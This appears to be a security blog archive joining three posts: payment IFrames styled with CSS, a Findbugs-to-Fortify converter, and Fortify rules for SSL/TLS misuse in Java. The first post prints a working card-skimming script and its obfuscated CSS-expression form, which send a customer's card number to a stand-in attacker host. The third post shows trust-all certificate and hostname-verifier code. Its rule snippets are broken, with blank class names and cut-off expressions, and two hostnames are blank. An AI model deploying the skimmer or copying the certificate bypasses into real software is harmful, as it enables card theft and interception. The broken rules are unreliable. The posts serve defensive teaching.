The Perils of Implementing Secure Payment IFrames

Web applications that handle sensitive data, in particular card payment information, commonly use an embedded IFrame to provide users with a seamless customer experience. This IFrame, which may be provided by a third-party payment service provider, should be served from a separate domain so that it benefits from the browser’s same-origin policy controls. These controls prevent direct interaction between the consuming web application and the frame processing the payment details. For example, JavaScript executing within the business application cannot read cardholder details from within the embedded payment frame. This is a common justification for removing the application from the scope of a PCI-DSS assessment, leaving only the (possibly third-party) IFrame that handles payment card data in scope.

This method of segregating sites that handle card data from those that don’t can be effective, provided some requirements are met. The first, as mentioned above, is that the business application and payment gateway should be served from completely different domains. Subdomains should not be used unless the security implications are fully understood because, in some cases, the same-origin policy can be bypassed by changing the “document.domain” value for the page: two pages on sibling subdomains can both set “document.domain” to their shared parent domain and then script each other. The second requirement is that no unvalidated data is passed from the business application to the payment IFrame. This is of critical importance: if data controllable by an attacker is processed within the context of the payment domain, the attacker may be able to read data such as the user’s Primary Account Number (PAN) from the payment IFrame.
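To make the first requirement concrete, the sketch below models the origin tuple that browsers compare (scheme, host and port) in Java. It is an illustration, not browser code, and it deliberately ignores the “document.domain” relaxation described above. That omission is exactly the risk with subdomains: two hypothetical sibling hosts such as “shop.example.com” and “pay.example.com” are different origins by this check, yet can still end up able to script each other. The two “.gds” hosts are the ones used in this post’s example attack.

```java
import java.net.URI;
import java.util.Locale;

/** Illustrative model of a browser origin: (scheme, host, port). Ignores document.domain. */
final class OriginCheck {
    private OriginCheck() {}

    /** Uses the scheme's default port when the URL does not name one explicitly. */
    static int effectivePort(URI uri) {
        if (uri.getPort() != -1) {
            return uri.getPort();
        }
        switch (uri.getScheme().toLowerCase(Locale.ROOT)) {
            case "https": return 443;
            case "http":  return 80;
            default:      return -1;
        }
    }

    /** True only if scheme, host and effective port are all identical. */
    static boolean sameOrigin(String a, String b) {
        URI ua = URI.create(a);
        URI ub = URI.create(b);
        return ua.getScheme().equalsIgnoreCase(ub.getScheme())
                && ua.getHost().equalsIgnoreCase(ub.getHost())
                && effectivePort(ua) == effectivePort(ub);
    }

    public static void main(String[] args) {
        // Business application vs payment frame: different host and port.
        System.out.println(sameOrigin("https://business-application.gds/style.css",
                "https://payment-provider.gds:4443/customer_pan.html")); // false
        // Hypothetical sibling subdomains: different origins unless document.domain is relaxed.
        System.out.println(sameOrigin("https://shop.example.com/",
                "https://pay.example.com/")); // false
    }
}
```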

While these concepts seem simple, the second requirement bears closer inspection. Ensuring that data such as user-supplied text is not passed to the payment IFrame is an obvious security control in this scenario. However, there are other, sometimes overlooked, ways in which data can be passed into the payment IFrame. Below we examine one such example that GDS has encountered during security assessments: stylesheets.

In many cases the source page for the payment IFrame is a generic site which handles payments for a large number of business applications, either within the same organisation or as a service to third parties. This page is unlikely to be styled the same way as the site using it, which may be an issue if it is important to reassure customers that they are dealing with a trustworthy retailer, or to present a consistent brand identity. To address this, it may be important to style the payment IFrame as if it were part of the business application in which it is embedded. This can be achieved by using images and CSS files which match those used by the business application; however, this opens up a potential problem.

If the image or CSS files used to style the payment IFrame are imported directly from the business application site, then an attacker who gains control over the business application, or the server it resides on, may be able to insert malicious data into these files, and consequently into the payment IFrame. This compromises the security model used by the application to isolate sensitive data and potentially brings the entire business application into scope for assessment of card data handling.

To avoid this scenario it is therefore important to ensure that all external resources used by the IFrame are only loaded from trusted locations that are not controlled by the business application or its hosting system. Any resources provided by the application or application owners should be reviewed prior to being made available from the payment domain to ensure that they are suitable.
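One way to enforce this, sketched below under stated assumptions, is to accept a stylesheet URL (such as the css parameter passed in the IFrame URL fragment in the example that follows) only if it points at a host and path that the payment provider controls and populates exclusively with reviewed files. The host “static.payment-provider.gds” and the “/reviewed-css/” prefix are hypothetical placeholders. The check is written in Java for consistency with the other examples; in practice it has to run wherever the parameter is actually consumed.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Collections;
import java.util.Locale;
import java.util.Set;

/** Sketch of an allowlist for stylesheet URLs requested by a payment page. */
final class StylesheetAllowlist {
    private StylesheetAllowlist() {}

    // Hypothetical location owned by the payment provider, serving only reviewed files.
    private static final Set<String> TRUSTED_HOSTS =
            Collections.singleton("static.payment-provider.gds");
    private static final String REVIEWED_PREFIX = "/reviewed-css/";

    static boolean isTrusted(String candidate) {
        URI uri;
        try {
            uri = new URI(candidate);
        } catch (URISyntaxException e) {
            return false; // unparseable input is never trusted
        }
        // Rejects data:, http:, javascript: and every other non-HTTPS scheme.
        if (!"https".equalsIgnoreCase(uri.getScheme())) {
            return false;
        }
        String host = uri.getHost();
        // Exact host match, so look-alikes such as "static.payment-provider.gds.evil.gds" fail.
        if (host == null || !TRUSTED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) {
            return false;
        }
        if (uri.getUserInfo() != null || (uri.getPort() != -1 && uri.getPort() != 443)) {
            return false;
        }
        String path = uri.getPath(); // percent-decoded, so "%2e%2e" appears as ".."
        return path != null
                && path.startsWith(REVIEWED_PREFIX)
                && !path.contains("..")
                && path.endsWith(".css");
    }
}
```

An allowlist is preferable to trying to recognise malicious CSS, because once the business application is compromised the attacker controls every byte of its stylesheet.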

Example Attack

The following is an example of an attack which could be carried out using a compromised CSS file.

For demonstration purposes, this is what the page looks like without the style applied; the borders of the IFrame are clearly visible.

When the style from the business application is applied, the page looks like this; as you can see, the IFrame, though still present, is no longer clearly visible.

The code to include the payment IFrame in the business application is as follows:

<iframe src="https://payment-provider.gds:4443/customer_pan.html#css=https://business-application.gds/style.css" width="600" height="110" frameBorder="0"></iframe>

As can be seen, the payment site is hosted on a different domain and port from the business application, so the restrictions of the same-origin policy apply. However, the payment IFrame loads the business application’s CSS file, whose URL is passed in the css parameter of the URL fragment, as shown below.

If an attacker were to gain control of the business application, they could change the stylesheet to insert a malicious payload. The following example is JavaScript code that extracts the customer’s PAN when the “Next” button is clicked and sends it to a remote, attacker-controlled location.

if(document.getElementById("stealer") == null) {
  var node=document.createElement("script");
  node.setAttribute("id","stealer");
  node.text='function steal() {' +
    'if(window.XDomainRequest) {' +
      'xmlhttp = new XDomainRequest()' +
    '} else if(window.XMLHttpRequest) {' +
      'xmlhttp = new XMLHttpRequest()' +
    '} else {' +
      'xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")' +
    '};' +
    'xmlhttp.open("GET",' +
      '"https://attacker.gds:31337/index.html?pan="+' +
      'document.getElementById("customerPan").value,' +
      'false);' +
    'xmlhttp.send();' +
    'document.getElementById("payment").submit()' +
  '};';
  document.getElementsByTagName('head')[0].appendChild(node)
}
try {
  document.getElementById("next").outerHTML=
    '<input id="next2" type="button" value="Next" ' +
    'onClick="steal()">'
} catch(err) { }

This code can be made to execute from a CSS file using CSS expressions. Expressions are re-evaluated whenever any action is performed on the page, so the code must check that its new elements have not already been added, and must catch any errors that may occur when replacing elements.

The following code (an encoding of the above) can be added as the first line of the style sheet to execute this attack.

@import "data:,*%7bx:expression(eval(String.fromCharCode(105,
  102, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 115, 116, 101, 97, 108, 101, 114, 34, 41, 32,
  61, 61, 32, 110, 117, 108, 108, 41, 123, 118, 97, 114, 32,
  110, 111, 100, 101, 61, 100, 111, 99, 117, 109, 101, 110,
  116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109,
  101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41,
  59, 110, 111, 100, 101, 46, 115, 101, 116, 65, 116, 116,
  114, 105, 98, 117, 116, 101, 40, 34, 105, 100, 34, 44, 34,
  115, 116, 101, 97, 108, 101, 114, 34, 41, 59, 110, 111,
  100, 101, 46, 116, 101, 120, 116, 61, 39, 102, 117, 110,
  99, 116, 105, 111, 110, 32, 115, 116, 101, 97, 108, 40, 41,
  123, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46, 88,
  68, 111, 109, 97, 105, 110, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 68, 111, 109, 97, 105, 110, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 32, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46,
  88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61, 32,
  110, 101, 119, 32, 65, 99, 116, 105, 118, 101, 88, 79, 98,
  106, 101, 99, 116, 40, 34, 77, 105, 99, 114, 111, 115, 111,
  102, 116, 46, 88, 77, 76, 72, 84, 84, 80, 34, 41, 125, 59,
  120, 109, 108, 104, 116, 116, 112, 46, 111, 112, 101, 110,
  40, 34, 71, 69, 84, 34, 44, 34, 104, 116, 116, 112, 115,
  58, 47, 47, 97, 116, 116, 97, 99, 107, 101, 114, 46, 103,
  100, 115, 58, 51, 49, 51, 51, 55, 47, 105, 110, 100, 101,
  120, 46, 104, 116, 109, 108, 63, 112, 97, 110, 61, 34, 43,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 34,
  99, 117, 115, 116, 111, 109, 101, 114, 80, 97, 110, 34, 41,
  46, 118, 97, 108, 117, 101, 44, 102, 97, 108, 115, 101, 41,
  59, 120, 109, 108, 104, 116, 116, 112, 46, 115, 101, 110,
  100, 40, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46,
  103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121,
  73, 100, 40, 34, 112, 97, 121, 109, 101, 110, 116, 34, 41,
  46, 115, 117, 98, 109, 105, 116, 40, 41, 125, 59, 39, 59,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,
  103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41,
  91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105,
  108, 100, 40, 110, 111, 100, 101, 41, 125, 59, 116, 114,
  121, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 110, 101, 120, 116, 34, 41, 46, 111, 117, 116,
  101, 114, 72, 84, 77, 76, 61, 39, 60, 105, 110, 112, 117,
  116, 32, 105, 100, 61, 34, 110, 101, 120, 116, 50, 34, 32,
  116, 121, 112, 101, 61, 34, 98, 117, 116, 116, 111, 110,
  34, 32, 118, 97, 108, 117, 101, 61, 34, 78, 101, 120, 116,
  34, 32, 111, 110, 67, 108, 105, 99, 107, 61, 34, 115, 116,
  101, 97, 108, 40, 41, 34, 62, 39, 125, 99, 97, 116, 99,
  104, 40, 101, 114, 114, 41, 123, 125)))%7D";
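The encoding is only a thin layer of obfuscation, which is worth knowing when reviewing stylesheets: the arguments to String.fromCharCode are plain UTF-16 code units. The following Java sketch (class and method names are illustrative) decodes them. Applied to the @import line above, it recovers the JavaScript payload; the first eleven codes alone decode to “if(document”.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Decodes String.fromCharCode(...) argument lists found in stylesheet text. */
final class CharCodeDecoder {
    private CharCodeDecoder() {}

    // Captures the comma/whitespace-separated numbers inside the first fromCharCode call.
    private static final Pattern CALL =
            Pattern.compile("String\\.fromCharCode\\(([0-9,\\s]+)\\)");

    /** Converts a list such as "105, 102, 40" into the characters it encodes. */
    static String decode(String csv) {
        StringBuilder sb = new StringBuilder();
        for (String part : csv.split(",")) {
            String trimmed = part.trim();
            if (!trimmed.isEmpty()) {
                sb.append((char) Integer.parseInt(trimmed));
            }
        }
        return sb.toString();
    }

    /** Returns the decoded text of the first fromCharCode call, or null if there is none. */
    static String decodeFirstCall(String css) {
        Matcher m = CALL.matcher(css);
        return m.find() ? decode(m.group(1)) : null;
    }
}
```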

The following screenshot shows the screen after the customer has entered their card number. For demonstration purposes, other card details are not required by this form, but they could also be trivially captured by an attacker.

When the “Next” button is clicked the customer’s PAN is sent to the attacker and the form is submitted. To the user it appears that nothing unusual has occurred and the normal next screen of the payment process is shown.

However, the customer’s PAN has already been received by the attacker, as shown below.


There are some limitations to this particular attack, though other attacks may not suffer the same limitations or may work on other browsers. This implementation only targets users of Internet Explorer, as it relies on CSS expressions. It will normally only work on Internet Explorer 7 and below; however, Internet Explorer versions up to 10 (Windows 8.0) can also be vulnerable, because Internet Explorer renders pages shown in an IFrame in the same compatibility mode as the parent page. If attackers control the business application, they can set the meta tag “<meta http-equiv="X-UA-Compatible" content="IE=7">” in the HTML header to force Internet Explorer 7 compatibility mode on the parent page, and therefore on the payment provider page. In Internet Explorer 11 (Windows 7 if updated, and Windows 8.1), CSS expressions are disabled for the “Internet” zone, so in this version the attack would only work for sites in the “Local intranet” or “Trusted sites” zones.
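Because this attack depends on script-capable CSS features of legacy Internet Explorer, a reviewer vetting a stylesheet before it is served from the payment domain might start with a crude pattern search like the Java sketch below. The pattern list is an assumption for illustration, not an exhaustive catalogue. CSS escapes and nested @import rules can hide keywords, which is why both are flagged. A denylist of this kind can only prioritise manual review; it does not replace serving reviewed files from a location the business application cannot modify.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

/** Heuristic flags for script-capable CSS constructs (legacy Internet Explorer). */
final class StylesheetScriptScan {
    private StylesheetScriptScan() {}

    private static final Pattern[] RISKY = {
        Pattern.compile("expression\\s*\\(", Pattern.CASE_INSENSITIVE), // CSS expressions
        Pattern.compile("behavior\\s*:", Pattern.CASE_INSENSITIVE),     // HTC behaviors
        Pattern.compile("javascript\\s*:", Pattern.CASE_INSENSITIVE),   // script URLs
        Pattern.compile("@import", Pattern.CASE_INSENSITIVE),           // pulls in unreviewed CSS
        Pattern.compile("\\\\"),                                        // any CSS escape sequence
    };

    /** Returns the source of every pattern that matches; empty means nothing was flagged. */
    static List<String> findings(String css) {
        List<String> hits = new ArrayList<>();
        for (Pattern p : RISKY) {
            if (p.matcher(css).find()) {
                hits.add(p.pattern());
            }
        }
        return hits;
    }
}
```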


Converting Findbugs XML to HP Fortify SCA FPR

At GDS, we frequently encounter organizations with mature Secure Development Lifecycle (SDL) processes that have integrated HP Fortify to perform static code analysis. As discussed in our previous post, GDS often assists organizations by developing custom security checks for security issues or insecure patterns identified during manual security code review. However, there are languages that Fortify does not directly support, making it difficult to integrate code written in those languages into an organization’s existing analysis framework.

Scala is an example of a language that is not supported by Fortify and therefore other static analysis tools must be used to perform security checks. In a previous blog post, we discussed how the Findbugs static analysis tool can be used to perform static analysis of Scala application bytecode. How can the Findbugs scan results be incorporated into an organization’s existing HP Fortify SSC server to manage the identified vulnerabilities? We have written a lightweight Java tool that can be used to convert a Findbugs XML report into a Fortify FPR file. This will allow the Findbugs results to be submitted to the SSC server as if scanned by HP Fortify SCA.

A Fortify FPR file is a compressed archive with a well-defined internal directory structure, as shown below:

[Screenshot: internal directory structure of an FPR archive]

The result of the SCA analysis is stored in XML format in the audit.fvdl file. The tool we have developed takes a Findbugs XML report and transforms it into an FPR file.

The Findbugs XML is first merged with a messages.xml file containing the finding descriptions and recommendations, covering both the findings bundled with Findbugs and the GDS-developed Scala ones. It is also possible to use a custom messages.xml as input, which is particularly useful for adding write-ups for your own custom Findbugs rules.

The merged file is then transformed into the FVDL data structure through an XSL Transformation (XSLT).

The XSLT processor takes the XML source document, plus an XSLT stylesheet, and processes them to produce an output document.
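The transformation step can be sketched with the standard JAXP API (javax.xml.transform). This is not the tool’s code. The stylesheet in main is a toy whose output element names (Issues, Issue) are placeholders rather than the real FVDL schema; the input only mimics the BugCollection/BugInstance shape of a Findbugs report.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

/** Applies an XSLT stylesheet to an XML document, both supplied as strings. */
final class XslConvert {
    private XslConvert() {}

    static String transform(String xml, String xsl) throws TransformerException {
        Transformer transformer = TransformerFactory.newInstance()
                .newTransformer(new StreamSource(new StringReader(xsl)));
        StringWriter out = new StringWriter();
        transformer.transform(new StreamSource(new StringReader(xml)), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws TransformerException {
        // Toy stylesheet: output element names are placeholders, not real FVDL.
        String xsl = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
                + "<xsl:output method=\"xml\" omit-xml-declaration=\"yes\"/>"
                + "<xsl:template match=\"/BugCollection\"><Issues>"
                + "<xsl:for-each select=\"BugInstance\"><Issue kind=\"{@type}\"/></xsl:for-each>"
                + "</Issues></xsl:template></xsl:stylesheet>";
        String xml = "<BugCollection><BugInstance type=\"EXAMPLE_A\"/>"
                + "<BugInstance type=\"EXAMPLE_B\"/></BugCollection>";
        System.out.println(transform(xml, xsl));
    }
}
```

Keeping the mapping in the stylesheet rather than in Java is what lets the conversion change without recompiling.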

This audit.fvdl file is then added to a pre-packaged zip archive with the other required files.
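Treating the FPR as a standard zip archive, the packaging step might look like the following sketch: every entry of the pre-packaged template is copied and the generated audit.fvdl is appended. The class name is illustrative, and nothing is assumed about which other files the real template contains.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

/** Copies a template archive and adds audit.fvdl (closes both streams when done). */
final class FprPackager {
    private FprPackager() {}

    static void pack(InputStream template, String auditFvdl, OutputStream out) throws IOException {
        try (ZipInputStream zin = new ZipInputStream(template);
             ZipOutputStream zout = new ZipOutputStream(out)) {
            byte[] buf = new byte[8192];
            ZipEntry entry;
            while ((entry = zin.getNextEntry()) != null) {
                if (entry.getName().equals("audit.fvdl")) {
                    continue; // never emit a duplicate audit.fvdl entry
                }
                zout.putNextEntry(new ZipEntry(entry.getName()));
                int n;
                while ((n = zin.read(buf)) > 0) {
                    zout.write(buf, 0, n);
                }
                zout.closeEntry();
            }
            zout.putNextEntry(new ZipEntry("audit.fvdl"));
            zout.write(auditFvdl.getBytes(StandardCharsets.UTF_8));
            zout.closeEntry();
        }
    }
}
```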

In doing so, the transformation is completely decoupled from the code: it depends only on the XSLT stylesheet used, which can be modified without recompiling the tool.

The application is packaged in a single runnable jar and can be used as follows:

$ java -jar convert2FPR.jar findbugs report.xml

To supply a custom messages.xml file, usage is as follows:

$ java -jar convert2FPR.jar findbugs messages.xml report.xml

In both cases, the output file is ./report.fpr.

The first parameter (findbugs) represents the input format and is mapped to the corresponding XSL stylesheet.



To extend the tool to support further input formats, only a new XSL file and one additional line of mapping code for each added stylesheet are required.
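The tool’s mapping code is not reproduced in this post. A hypothetical version of the idea might look like the sketch below: the format name from the command line selects a stylesheet, so a new format needs one stylesheet and one map entry. The resource paths, and the commented-out “pmd” entry, are invented for illustration.

```java
import java.util.Collections;
import java.util.HashMap;
import java.util.Locale;
import java.util.Map;

/** Hypothetical lookup from the input-format argument to its XSL stylesheet. */
final class FormatRegistry {
    private FormatRegistry() {}

    private static final Map<String, String> XSL_BY_FORMAT;

    static {
        Map<String, String> m = new HashMap<>();
        m.put("findbugs", "xsl/findbugs-to-fvdl.xsl"); // hypothetical resource path
        // A further format would need its stylesheet plus one line, e.g.:
        // m.put("pmd", "xsl/pmd-to-fvdl.xsl");        // hypothetical
        XSL_BY_FORMAT = Collections.unmodifiableMap(m);
    }

    /** Resolves a format name such as "findbugs"; unknown formats are rejected. */
    static String stylesheetFor(String format) {
        String xsl = XSL_BY_FORMAT.get(format.toLowerCase(Locale.ROOT));
        if (xsl == null) {
            throw new IllegalArgumentException("Unsupported input format: " + format);
        }
        return xsl;
    }
}
```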

The source code and compiled tool can be found in our GitHub repository:


Fortify SCA Custom Rules for JSSE APIs Misuse

While delivering GDS secure SDLC services, we often develop a range of custom security checks and static analysis rules for detecting insecure coding patterns that we find during our source code security reviews. These patterns can represent either common security flaws or unique security weaknesses specific to the application being assessed, its architecture/design, the components it uses, or even the development team itself. These custom rules are often developed to target specific languages and implemented within a specific static analysis tool, depending on what our client already uses or is most comfortable with; previous examples include FindBugs, PMD, Visual Studio and, of course, Fortify SCA.

In this blog post I will focus on developing PoC rules for Fortify SCA that target Java-based applications; however, the same concepts can easily be extended to other tools and/or development languages.

The recent vulnerability that affected Duo Mobile confirms the analysis of Georgiev et al., who demonstrated that a wide range of serious security flaws result from incorrect SSL/TLS certificate validation in various non-browser software, libraries and middleware.

Specifically, in this post we focus on how to identify insecure use of the SSL/TLS APIs in Java, which could result in Man-in-the-Middle or spoofing attacks that allow a malicious host to impersonate a trusted one. Integrating HP Fortify SCA into the SDLC allows applications to be scanned for vulnerabilities efficiently and regularly. We found that issues caused by misuse of the SSL APIs are not identified by the out-of-the-box rule sets, so we developed a comprehensive pack of 12 custom rules for Fortify.

SSL/TLS (Secure Sockets Layer and its successor, Transport Layer Security) is the most widely used protocol for secure communication over the web, using cryptographic processes to provide authentication, confidentiality and integrity. To establish the identity of the communicating party, X.509 certificates must be exchanged and verified. Once the parties are authenticated, the protocol provides an encrypted connection. SSL/TLS cipher suites also include a message authentication mechanism (for example, an HMAC built on a secure hash function), which protects the integrity of the data.

When using SSL/TLS, the following two steps must be performed to ensure that no man in the middle can tamper with the channel:

  • Certificate Chain-of-Trust verification: an X.509 certificate specifies the name of the certificate authority (CA) that issued it. The server also sends the client the certificates of any intermediate CAs, up to a root CA. The client verifies the signature and expiration of each certificate (and performs other checks outside the scope of this post, such as revocation, basic constraints and policy constraints), starting from the server’s certificate at the bottom and working up to the root CA, which must be one the client already trusts. If the algorithm reaches the last certificate in the chain with no violations, verification is successful.
  • Hostname Verification: after the chain of trust is established, the client must verify that the subject of the X.509 certificate matches the fully qualified DNS name of the requested server. RFC 2818 prescribes using the subjectAltName extension, falling back to the Common Name only for backwards compatibility when no subjectAltName of type dNSName is present.
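The name-matching rule in the second step can be illustrated with a simplified Java sketch (class and method names are illustrative). It is deliberately stricter than RFC 2818, which also permits partial-label wildcards such as “f*.com”. It does not reject over-broad wildcards such as “*.com” and ignores IP-address names, so it is meant for understanding only; real code should rely on the JSSE implementation rather than a hand-rolled matcher.

```java
import java.util.List;
import java.util.Locale;

/** Simplified illustration of RFC 2818-style certificate name matching. */
final class HostnameMatch {
    private HostnameMatch() {}

    static boolean matches(String host, List<String> dnsSubjectAltNames, String commonName) {
        String h = host.toLowerCase(Locale.ROOT);
        if (!dnsSubjectAltNames.isEmpty()) {
            // dNSName SANs present: they are the identity and the CN is ignored.
            for (String san : dnsSubjectAltNames) {
                if (matchesPattern(h, san.toLowerCase(Locale.ROOT))) {
                    return true;
                }
            }
            return false;
        }
        // Legacy fallback, used only when the certificate has no dNSName SAN.
        return commonName != null && matchesPattern(h, commonName.toLowerCase(Locale.ROOT));
    }

    /** "*.example.com" matches exactly one extra left-most label; other names must be equal. */
    private static boolean matchesPattern(String host, String pattern) {
        if (!pattern.startsWith("*.")) {
            return host.equals(pattern);
        }
        String suffix = pattern.substring(1); // e.g. ".example.com"
        if (!host.endsWith(suffix)) {
            return false;
        }
        String label = host.substring(0, host.length() - suffix.length());
        return !label.isEmpty() && !label.contains(".");
    }
}
```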

The following misuse cases can occur when SSL/TLS APIs are not used securely, and can cause an application to transmit sensitive information over a compromised SSL/TLS channel.

Trusting All Certificates

The application implements a custom TrustManager whose logic trusts every presented server certificate without performing Chain-of-Trust verification.

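TrustManager[] trustAllCerts = new TrustManager[] {
    new X509TrustManager() {
        public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
        public void checkClientTrusted(X509Certificate[] certs, String authType) {}
        // INSECURE: accepts every server certificate chain without any validation
        public void checkServerTrusted(X509Certificate[] certs, String authType) {}
    }
};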

This case usually originates from development environments where self-signed certificates are widely used. In our experience, developers commonly disable certificate validation altogether instead of loading the certificate into their keystore. This dangerous coding pattern then accidentally makes its way into production releases.

When this occurs, it is similar to removing the batteries from a smoke detector: the detector (validation) is still there, providing a false sense of safety, but it will not detect the smoke (an untrusted party). In fact, when a client connects to a server, the validation routine will happily accept any server certificate.

A search on GitHub for the above vulnerable code returns 13,823 results. On StackOverflow, too, a number of questions ask how to ignore certificate errors and receive replies similar to the above vulnerable code. It is concerning that the most upvoted answers suggest disabling trust management entirely.
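A safer alternative to the trust-all pattern, sketched below, is to trust the development certificate explicitly while leaving standard certificate validation in place. The class name and the “dev-server” alias are hypothetical, and such a context should still be confined to development builds. Importing the certificate into the JVM trust store with keytool achieves the same result without code changes.

```java
import java.io.IOException;
import java.io.InputStream;
import java.security.GeneralSecurityException;
import java.security.KeyStore;
import java.security.cert.Certificate;
import java.security.cert.CertificateFactory;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;

/** Builds an SSLContext that trusts exactly one (e.g. self-signed development) certificate. */
final class DevCertTrust {
    private DevCertTrust() {}

    static SSLContext contextTrusting(InputStream certificate)
            throws GeneralSecurityException, IOException {
        // Throws CertificateException if the input is not a parseable X.509 certificate.
        Certificate cert = CertificateFactory.getInstance("X.509").generateCertificate(certificate);

        KeyStore trustStore = KeyStore.getInstance(KeyStore.getDefaultType());
        trustStore.load(null, null);                        // empty, in-memory key store
        trustStore.setCertificateEntry("dev-server", cert); // hypothetical alias

        // The platform's default TrustManager still validates chains; only the anchors change.
        TrustManagerFactory tmf =
                TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(trustStore);

        SSLContext context = SSLContext.getInstance("TLS");
        context.init(null, tmf.getTrustManagers(), null);
        return context;
    }
}
```

The socket factory returned by the context’s getSocketFactory() can then be supplied to the connection in the development build, instead of a TrustManager that accepts everything.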

Allowing All Hostnames

The application does not check whether the digital certificate sent by the server was issued for the host the client is connecting to.

The Java Secure Socket Extension (JSSE) provides two sets of APIs to establish secure communications, a high-level HttpsURLConnection API and a low-level SSLSocket API.

The HttpsURLConnection API performs hostname verification by default; again, this can be disabled by supplying a HostnameVerifier whose verify() method accepts everything (there are around 12,800 results when searching GitHub for the code below).

HostnameVerifier allHostsValid = new HostnameVerifier() {
    // INSECURE: accepts any hostname, defeating hostname verification
    public boolean verify(String hostname, SSLSession session) {
        return true;
    }
};

The SSLSocket API does not perform hostname verification out of the box. The snippet below comes from the Java 8 JSSE implementation: hostname verification is performed only if the endpoint identification algorithm is neither null nor an empty String.

private void checkTrusted(X509Certificate[] chain, String authType,
        SSLEngine engine, boolean isClient) throws CertificateException {
    // ... (chain validation and retrieval of the handshake session elided)
    String identityAlg = engine.getSSLParameters().
            getEndpointIdentificationAlgorithm();
    if (identityAlg != null && identityAlg.length() != 0) {
        checkIdentity(session, chain[0], identityAlg, isClient, ...);
    }
    // ...
}

When SSL/TLS clients use the raw SSLSocketFactory instead of the HttpsURLConnection wrapper, the identification algorithm is set to null, so hostname verification is silently skipped. As a result, if an attacker has a MITM position on the network when a client connects to ‘’, the application will also accept a valid server certificate issued for ‘’.

This documented behavior is buried in the JSSE Reference Guide:

“When using raw SSLSocket and SSLEngine classes, you should always check the peer’s credentials before sending any data. The SSLSocket and SSLEngine classes do not automatically verify that the host name in a URL matches the host name in the peer’s credentials. An application could be exploited with URL spoofing if the host name is not verified.”
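With a raw SSLSocket (Java 7 and later), the JSSE hostname check can be switched on by setting the endpoint identification algorithm to “HTTPS”. A certificate that does not match the requested host then fails the handshake. The following is a minimal sketch; the class and method names are illustrative.

```java
import java.io.IOException;
import javax.net.ssl.SSLParameters;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

/** Raw SSLSocket usage with JSSE's built-in hostname verification enabled. */
final class VerifiedSockets {
    private VerifiedSockets() {}

    /** Enables the HTTPS (RFC 2818) endpoint identity check on the socket. */
    static SSLSocket enableHostnameVerification(SSLSocket socket) {
        SSLParameters params = socket.getSSLParameters();
        params.setEndpointIdentificationAlgorithm("HTTPS");
        socket.setSSLParameters(params);
        return socket;
    }

    /** Connects and handshakes; a certificate for the wrong host fails the handshake. */
    static SSLSocket connect(String host, int port) throws IOException {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        SSLSocket socket = (SSLSocket) factory.createSocket(host, port);
        try {
            enableHostnameVerification(socket); // must happen before the handshake
            socket.startHandshake();            // SSLHandshakeException on a name mismatch
            return socket;
        } catch (IOException e) {
            socket.close();
            throw e;
        }
    }
}
```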

Our contribution: Fortify SCA Rules

To detect the above insecure usage, we have coded the following checks in 12 custom rules for HP Fortify SCA. These rules identify issues in code relying on both JSSE and Apache HttpClient, since they are widely used libraries for thick clients and Android apps.

  • Over-Permissive Hostname Verifier: the rule fires when the code declares a HostnameVerifier whose verify() method always returns ‘true’.

Function f: is "verify" and f.enclosingClass.supers 
contains [Class: name=="" ] and 
f.parameters[0] is "java.lang.String" and 
f.parameters[1] is "" and is "boolean" and f contains 
[ReturnStatement r: r.expression.constantValue matches "true"] 

  • Over-Permissive Trust Manager: the rule fires when the code declares a TrustManager whose checkServerTrusted() method never throws a CertificateException. Throwing this exception is how the API reports that a certificate chain must not be trusted.

Function f: is "checkServerTrusted" and 
f.parameters[0] is "" 
and f.parameters[1] is "java.lang.String" and is "void" and not f contains [ThrowStatement t: 
t.expression.type.definition.supers contains [Class: name == 

  • Missing Hostname Verification: the rule fires when the code uses the Low-Level SSLSocket API and does not set a HostnameVerifier.

